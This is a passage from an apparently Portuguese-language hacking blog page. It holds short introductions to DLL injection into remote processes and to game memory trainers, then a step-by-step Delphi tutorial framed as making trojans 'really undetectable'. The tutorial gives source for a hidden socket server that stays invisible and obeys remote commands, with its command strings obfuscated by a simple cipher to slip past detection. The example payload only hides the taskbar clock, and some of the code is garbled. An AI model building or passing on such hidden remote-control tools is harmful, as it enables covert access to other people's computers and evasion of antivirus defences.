INW-Segurança

Visto que é algo muito util e um pouco complicado estarei postando como fazer passo a passo.
Então vamos começar.

Dica:
Para quem não esta acostumado e sequer sabe sobre manipulação de memória recomendo que de uma boa lida em artigos sobre manipulação de memória para que haja uma facilidade de entendimento ao seguir a leitura do tutorial.

O que é Code Injection?
Code injection nada mais é do que injetar uma DLL e fazer com que o processo remoto execute a tal função.
Para fazer isso precisaremos de uma DLL que a função em seja exportada
Ex:no delphi o fim do código seria

exports
FazerExitProcess;

Outro detalhe importante é que precisaremos de privilégios necessários.Para evitar quaisquer eventuais problemas, definiremos o privilégio como o de debug e tambem depois de executada a rotina, não temos mais porque deixar os parametros utilizados na execução da mesma no target, isso só iria ocupar espaço, então nós liberaremos toda a memória escrita no processo remoto.

Preparando um Code Injection
Leia Mais →

Recebi muitos pedidos para criar esse Tutorial e antes de iniciar tenho algumas recomendações:

1- Saiba o Mínimo do Delphi
2- Não de CtrlV & C nas Funções,reserve um pouco do seu Tempo para ler e entender o que cada Função faz.
3- Se não entendeu,leia novamente.

Vamos iniciar,antes vou explicar como Funciona.

Funcionamento Geral

Um Trainer tem um processo básico que altera um valor na memória. Esse valor pode ser a quantidade de vida que você tem num Jogo ou até mesmo um numero qualquer. A memória no caso pode ser o Jogo,um software qualquer.

A memória atribui um endereço em cada valor,esse endereço pode ser pego utilizando qualquer software que “desmonte” a memória do jogo,o mais usado é o cheatengine que já faz praticamente tudo,ele lê e altera o valor para você.

Agora vamos para parte de programação.
Leia Mais →

Olá.

Agora vou mostrar como deixar seus trojans Realmente indetectáveis em delphi.

Montando:

Abra o delphi e vá em Install Packages

Coloque ADD e vá em no

diretório do seu delphi + \Bin\dclsockets70.bpl.

Agora no delphi adicione:

1 label (paleta Standard).

1 Edit (paleta Standard).

2 Botões (paleta Standard).

1 Panel (paleta Standard).

1 ClientSocket (paleta Internet).

Mude o text da Edit para “127.0.0.1″.

Mude o capition da label para “Ip:” o do Botão 1 para “Conectar” e o Botão2 para “Desconectar”.

O capition do panel deixe em branco.

Mude a port do ClientSocket para “12″

Deve estar assim sua form:

Agora clique duas vezes no botão conectar, e coloque o seguinte código:

procedure TForm1.Button1Click(Sender: TObject);

begin

ClientSocket1.Host := edit1.Text;

ClientSocket1.Active := true;

end;

E no botão desconectar:

procedure TForm1.Button2Click(Sender: TObject);

begin

ClientSocket1.Active := false;

end;

Agora adicione um botão e altere o capition para “Ocultar Relógio” e no código coloque:

procedure TForm1.Button3Click(Sender: TObject);

begin

ClientSocket1.Socket.SendText(‘ocultar’);

end;

Adicione outro botão e altere o capition para “Mostrar Relógio” e no código coloque:

procedure TForm1.Button4Click(Sender: TObject);

begin

ClientSocket1.Socket.SendText(‘mostrar’);

end;

Agora salve tudo em uma pasta e abra:

Adicione um Serversocket (paleta Internet).

Agora abra Events da form1

E clique duas vezes em OnCreate e como codigo coloque:

procedure TForm1.FormCreate(Sender: TObject);

begin

application.ShowMainForm := false;

end;

E No código adicione isso:

function EnDecryptString(StrValue : String; Chave: Word) : String;

var

I: Integer;

OutValue : String;

begin

OutValue := ”;

for I := 1 to Length(StrValue) do

OutValue := OutValue + char(Not(ord(StrValue[I])-Chave));

Result := OutValue;

end;

Agora baixe o ..Criptograf.. e abra ele.

Em texto para criptografar coloque “ocultar”

E clique em Criptografar deve formar o seguinte

texto |ˆvwŠy Copie ele.

Volte no Delphi.

Agora no ServerSocket coloque port 12

E Active true. E em events clique das vezes

OnClientRead e coloque o seguinte codigo:

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;

Socket: TCustomWinSocket);

var

receber : String;

begin

receber := Socket.ReceiveText;

if receber = EnDecryptString(‘~|xwyŠy’, 236) then

ShowWindow( FindWindowEx(FindWindowEx( FindWindow(‘Shell_TrayWnd’, nil), HWND(0), ‘TrayNotifyWnd’, nil), HWND(0), ‘TrayClockWClass’, nil), Sw_Hide)

~|xwyŠy é a criptografia de “mostrar” Pronto! Agora é só testar.

Baixar Source